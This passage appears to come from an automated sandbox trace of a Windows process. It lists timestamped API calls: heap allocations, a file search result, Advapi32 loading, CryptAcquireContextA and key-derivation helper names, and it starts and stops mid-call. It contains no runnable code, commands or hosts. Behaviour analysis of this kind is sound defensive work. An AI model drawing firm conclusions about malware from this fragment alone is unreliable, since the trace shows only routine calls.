dwReserved1=0x777648, cFileName="Nhz507zeCNmw5OeL.jpg", cAlternateFileName="NHZ507~1.JPG")) returned 0x7c2100 [0030.071] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0030.072] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.072] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0030.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x7ae928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.075] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContext") returned 0x0 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15) returned 0x7ae928 [0030.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x7ae928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.075] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextA") returned 0x754b91dd [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0030.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0030.076] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.078] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.078] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.078] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0030.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0030.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.078] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.078] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.078] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0030.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.079] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.079] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.079] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.079] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.079] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.079] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.079] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.079] PeekMessageW (in: 